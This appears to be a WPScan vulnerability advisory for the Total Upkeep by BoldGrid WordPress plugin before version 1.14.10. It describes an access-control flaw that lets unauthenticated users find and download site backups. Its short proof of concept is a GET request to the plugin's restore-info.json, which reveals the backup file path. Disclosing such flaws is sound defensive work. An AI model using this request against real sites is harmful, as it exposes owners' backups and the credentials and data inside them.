How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Total Upkeep by BoldGrid < 1.14.10 - Unauthenticated Backup Download

Description

The plugin does not restrict access to a file containing sensitive information, such as the internal path of backups, which may then allow unauthenticated users to download them.

Proof of Concept

The filepath in /wp-content/plugins/boldgrid-backup/cron/restore-info.json will reveal the internal path of the backup file, which might be publicly accessible.

GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json

{
    [...]
    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
    [...]
}

Affects Plugins

boldgrid-backup

Fixed in version 1.14.10

References

ExploitDB

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

Miscellaneous

Original Researcher

Wadeek

Verified

Yes

WPVDB ID

d35c19d9-8586-4c5b-9a01-44739cbeee19

Timeline

Publicly Published

2020-12-14 (about 1 years ago)

Added

2020-12-14 (about 1 years ago)

Last Updated

2020-12-15 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin